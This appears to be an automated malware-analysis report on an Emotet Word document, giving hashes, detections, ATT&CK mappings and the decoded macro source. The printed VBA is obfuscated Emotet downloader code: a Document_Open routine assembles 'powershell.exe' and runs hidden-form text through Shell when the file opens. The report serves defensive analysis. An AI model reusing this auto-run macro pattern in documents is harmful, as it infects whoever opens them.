Emotet Office (OLE) malware analysis — malicious · 1a4c6a9c9e4bcce9

MALICIOUS

Office (OLE)

265.5 KB Created: 2019-02-04 12:09:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: ec9d4b199b1323229f448cd92320d2dc SHA-1: 4794e5ba0383cde6680feefdc952e315311a103a SHA-256: 1a4c6a9c9e4bcce9f83776f87f158d39cb21eb78ea839afaa01abf3f93c49a4c

182 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.Emotet-6846065-0' strongly suggests the Emotet family, known for its downloader capabilities.

Heuristics 5

ClamAV: Doc.Downloader.Emotet-6846065-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6846065-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1646 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1646 bytes
SHA-256: `c859e46a5dd4bb3eba0867158dbf1e01dc0ad89dc7dd1cd56d9ef4738123784d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Dim l3pvQHm8l(11 To 85) As String l3pvQHm8l(11) = "c5sJAz" Dim AAiuzE AAiuzE = wUXnbtIP3 Dim xicDQwkq xicDQwkq = ApQJTN Call w("er") End Sub Attribute VB_Name = "bOX8wu" Sub w(fhc1OBWLx) Dim D1QFe7Ok() As Byte Dim CePqW6m As String CePqW6m = nyOHbU Dim Cf0cs(254) As Byte Dim pgn4l(42) As Byte AXx7F0aG = "shell.exe " Dim lmxwvg As String lmxwvg = E5y3wFA Dim HE1dmaP As Long HE1dmaP = (2496 / 208) - (29) Shell GLa6B9u() _ & fhc1OBWLx _ & AXx7F0aG _ & q1z5K _ , 0 Dim cvbDlPg6t(37) As Byte Dim gp4ra9s1() As Byte End Sub Attribute VB_Name = "C62bq8hUe" Public Function GLa6B9u() As String Dim bnNlw As Long bnNlw = (542 - 540) - (34) GLa6B9u = "pow" End Function Attribute VB_Name = "ndqsZM" Public Function q1z5K() Dim RDq4yrN37 As Object Dim wpC7rWvI(100) As Byte Set RDq4yrN37 = New f Dim KmtJQpgD2 As Long KmtJQpgD2 = (-651 + 671) - (19) Dim AZBO3DA0o As String AZBO3DA0o = RDq4yrN37.de.Text Dim Gvhgk(136) As Byte q1z5K = AZBO3DA0o End Function Attribute VB_Name = "f" Attribute VB_Base = "0{1714BF04-D50D-4C2B-8321-76D539198311}{86F2EB54-ED4C-4E2F-B1DC-1D7122C44088}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: c859e46a5dd4bb3eba0867158dbf1e01dc0ad89dc7dd1cd56d9ef4738123784d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()
Dim l3pvQHm8l(11 To 85) As String
l3pvQHm8l(11) = "c5sJAz"
Dim AAiuzE
AAiuzE = wUXnbtIP3

Dim xicDQwkq
xicDQwkq = ApQJTN
Call w("er")
End Sub

Attribute VB_Name = "bOX8wu"
Sub w(fhc1OBWLx)
Dim D1QFe7Ok() As Byte
Dim CePqW6m As String
CePqW6m = nyOHbU
Dim Cf0cs(254) As Byte
Dim pgn4l(42) As Byte
AXx7F0aG = "shell.exe "
Dim lmxwvg As String
lmxwvg = E5y3wFA
Dim HE1dmaP As Long
HE1dmaP = (2496 / 208) - (29)
Shell GLa6B9u() _
& fhc1OBWLx _
& AXx7F0aG _
& q1z5K _
, 0
Dim cvbDlPg6t(37) As Byte
Dim gp4ra9s1() As Byte
End Sub

Attribute VB_Name = "C62bq8hUe"
Public Function GLa6B9u() As String
Dim bnNlw As Long
bnNlw = (542 - 540) - (34)
GLa6B9u = "pow"
End Function

Attribute VB_Name = "ndqsZM"
Public Function q1z5K()
Dim RDq4yrN37 As Object
Dim wpC7rWvI(100) As Byte
Set RDq4yrN37 = New f
Dim KmtJQpgD2 As Long
KmtJQpgD2 = (-651 + 671) - (19)
Dim AZBO3DA0o As String
AZBO3DA0o = RDq4yrN37.de.Text
Dim Gvhgk(136) As Byte
q1z5K = AZBO3DA0o
End Function

Attribute VB_Name = "f"
Attribute VB_Base = "0{1714BF04-D50D-4C2B-8321-76D539198311}{86F2EB54-ED4C-4E2F-B1DC-1D7122C44088}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.